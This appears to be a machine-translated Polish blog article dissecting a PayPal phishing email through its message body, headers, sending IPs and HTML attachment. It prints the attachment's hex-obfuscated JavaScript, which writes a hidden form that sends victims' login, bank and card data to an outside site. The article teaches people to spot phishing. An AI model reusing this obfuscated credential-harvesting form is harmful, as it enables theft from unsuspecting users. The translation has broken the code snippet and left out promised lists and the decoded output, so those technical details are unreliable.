W dzisiejszym świecie, w którym wszystkie informacje są dostępne online, phishing jest jednym z najbardziej popularnych i niszczących ataków internetowych, ponieważ zawsze możesz wyczyścić wirusa, ale jeśli dane bankowe zostaną skradzione, masz kłopoty. Oto podział jednego z takich ataków, które otrzymaliśmy.
Nie myśl, że ważne są tylko twoje dane bankowe: w końcu, jeśli ktoś zyska kontrolę nad swoim loginem do konta, nie tylko zna informacje zawarte na tym koncie, ale szanse są takie same, że dane logowania mogą być używane na różnych innych konta. A jeśli naruszą twoje konto e-mail, mogą zresetować wszystkie inne hasła.
Tak więc oprócz utrzymywania silnych i zmiennych haseł, musisz zawsze zwracać uwagę na fałszywe e-maile, które są maskowane jako prawdziwe. Podczas gdy większość prób phishingu jest amatorska, niektóre są dość przekonujące, dlatego ważne jest, aby zrozumieć, jak rozpoznać je na poziomie powierzchni, a także jak działają pod maską.
Obraz autorstwa asirap
Nasz przykładowy adres e-mail, podobnie jak większość prób wyłudzenia informacji, "powiadamia" Cię o aktywności na koncie PayPal, co w normalnych okolicznościach może być alarmujące. Tak więc wezwanie do działania polega na weryfikacji / przywróceniu konta poprzez przesłanie prawie każdej informacji osobistej, którą możesz wymyślić. Ponownie, jest to dość formuła.
Chociaż z pewnością istnieją wyjątki, praktycznie każda wiadomość e-mail dotycząca phishingu i przekrętu jest ładowana czerwonymi flagami bezpośrednio w samej wiadomości. Nawet jeśli tekst jest przekonujący, zwykle można znaleźć wiele błędów zaśmieconych w treści wiadomości, które wskazują, że wiadomość nie jest prawidłowa.
Ciało wiadomości
Na pierwszy rzut oka jest to jeden z lepszych e-maili phishingowych, jakie widziałem. Nie ma błędów ortograficznych ani gramatycznych, a słownictwo czyta się zgodnie z oczekiwaniami. Jest jednak kilka czerwonych flag, które możesz zobaczyć, kiedy przyjrzysz się bliżej zawartości.
Nagłówek wiadomości
Kiedy spojrzysz na nagłówek wiadomości, pojawi się kilka dodatkowych czerwonych flag:
Załącznik
Gdy otworzę załącznik, natychmiast zobaczysz, że układ jest nieprawidłowy, ponieważ brakuje informacji o stylu. Ponownie, dlaczego firma PayPal wysyłałaby e-maile do formularza HTML, skoro mogliby po prostu podać link w swojej witrynie?
Uwaga: użyliśmy wbudowanej przeglądarki załączników do Gmaila, ale zalecamy, aby NIE otwierać załączników od oszustów. Nigdy. Zawsze. Bardzo często zawierają exploity, które instalują trojany na komputerze w celu kradzieży informacji o koncie.
Jeszcze bardziej przewijając, widać, że ten formularz wymaga nie tylko naszych danych logowania do systemu PayPal, ale także danych bankowych i kart kredytowych. Niektóre obrazy są zepsute.
Jest oczywiste, że ta próba phishingu za każdym razem idzie jednym ciosem.
Chociaż powinno być całkiem jasne, biorąc pod uwagę to, co na pierwszy rzut oka jest próbą phishingu, teraz mamy zamiar przełamać techniczny wygląd wiadomości i zobaczyć, co możemy znaleźć.
Informacje z załącznika
Pierwszą rzeczą, na którą należy spojrzeć, jest źródło HTML formularza załącznika, który przekazuje dane do fałszywej witryny.
Kiedy szybko przeglądasz źródło, wszystkie linki wydają się poprawne, ponieważ wskazują na "paypal.com" lub "paypalobjects.com", które są zarówno uzasadnione.
Teraz przyjrzymy się kilku podstawowym informacjom na stronie, które Firefox gromadzi na stronie.
Jak widać, niektóre grafiki są pobierane z domen "blessedtobe.com", "goodhealthpharmacy.com" i "pic-upload.de" zamiast legalnych domen PayPal.
Informacje z nagłówków wiadomości e-mail
Następnie przyjrzymy się surowym nagłówkom wiadomości e-mail. Gmail udostępnia to za pomocą opcji menu Pokaż oryginał w wiadomości.
Patrząc na informacje w nagłówku oryginalnej wiadomości, możesz zobaczyć, że ta wiadomość została napisana przy użyciu programu Outlook Express 6. Wątpię, aby firma PayPal miała kogoś z personelu, który wysyła te wiadomości ręcznie za pomocą przestarzałego klienta poczty e-mail.
Patrząc na informacje o trasie, możemy zobaczyć adres IP zarówno nadawcy, jak i serwera poczty przychodzącej.
Adres IP użytkownika jest oryginalnym nadawcą. Wykonując szybkie wyszukiwanie informacji o IP, możemy zauważyć, że wysyłający adres IP znajduje się w Niemczech.
A kiedy patrzymy na serwer poczty przekazującej (mail.itak.at), adres IP widzimy, że jest to dostawca usług internetowych z siedzibą w Austrii. Wątpię, aby system PayPal wysyłał wiadomości e-mail bezpośrednio przez dostawcę usług internetowych z Austrii, gdy mają one masową farmę serwerów, która mogłaby z łatwością obsłużyć to zadanie.
Gdzie się znajduje dane?
Wyraźnie stwierdziliśmy, że jest to phishingowy adres e-mail i zebrano informacje o tym, skąd pochodzi wiadomość, ale co z tym, gdzie wysyłane są twoje dane?
Aby to zobaczyć, musimy najpierw zapisać załącznik HTM do naszego pulpitu i otworzyć go w edytorze tekstu. Przewijanie, wszystko wydaje się być w porządku, chyba że dojdziemy do podejrzanie wyglądającego bloku JavaScript.
Przełamując pełne źródło ostatniego bloku Javascript, widzimy:
// Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
var i, y, x = "3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e"; y = "; dla (i = 0;<>
Za każdym razem, gdy widzisz duży pomieszany ciąg pozornie przypadkowych liter i cyfr osadzonych w bloku JavaScript, zwykle jest to coś podejrzanego. Patrząc na kod, zmienna "x" jest ustawiona na ten duży ciąg, a następnie dekodowana do zmiennej "y". Końcowy wynik zmiennej "y" jest następnie zapisywany w dokumencie jako HTML.
Ponieważ duży ciąg składa się z cyfr 0-9 i liter a-f, najprawdopodobniej jest kodowany za pomocą prostej konwersji ASCII na Hex:
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e
Przetłumaczyć na:
To nie jest przypadek, że dekoduje się do prawidłowego znacznika formularza HTML, który wysyła wyniki nie do PayPal, ale do fałszywej strony.
Dodatkowo, gdy wyświetlisz źródło HTML formularza, zobaczysz, że ten tag formularza nie jest widoczny, ponieważ jest generowany dynamicznie przez JavaScript. Jest to sprytny sposób na ukrycie tego, co faktycznie robi HTML, jeśli ktoś po prostu wyświetli wygenerowane źródło załącznika (tak jak wcześniej), zamiast otwierania załącznika bezpośrednio w edytorze tekstów.
Po uruchomieniu szybkiego whois na obraźliwej stronie możemy zauważyć, że jest to domena hostowana na popularnym hoście internetowym 1and1.
Co wyróżnia się, że domena używa czytelnej nazwy (w przeciwieństwie do czegoś takiego jak "dfh3sjhskjhw.net"), a domena została zarejestrowana przez 4 lata. Z tego powodu uważam, że ta domena została porwana i wykorzystana jako pionek w tej próbie phishingu.
Jeśli chodzi o bezpieczeństwo w Internecie, nigdy nie boli Cię dobry cynizm.
Chociaż jestem pewien, że w przykładowym e-mailu jest więcej czerwonych flag, to, co wskazaliśmy powyżej, to wskaźniki, które widzieliśmy po zaledwie kilku minutach badania. Hipotetycznie, jeśli poziom powierzchni wiadomości e-mail naśladował jej prawowitego odpowiednika w 100%, analiza techniczna nadal ujawniałaby jego prawdziwy charakter. To dlatego importuje możliwość sprawdzenia, co możesz i czego nie możesz zobaczyć.
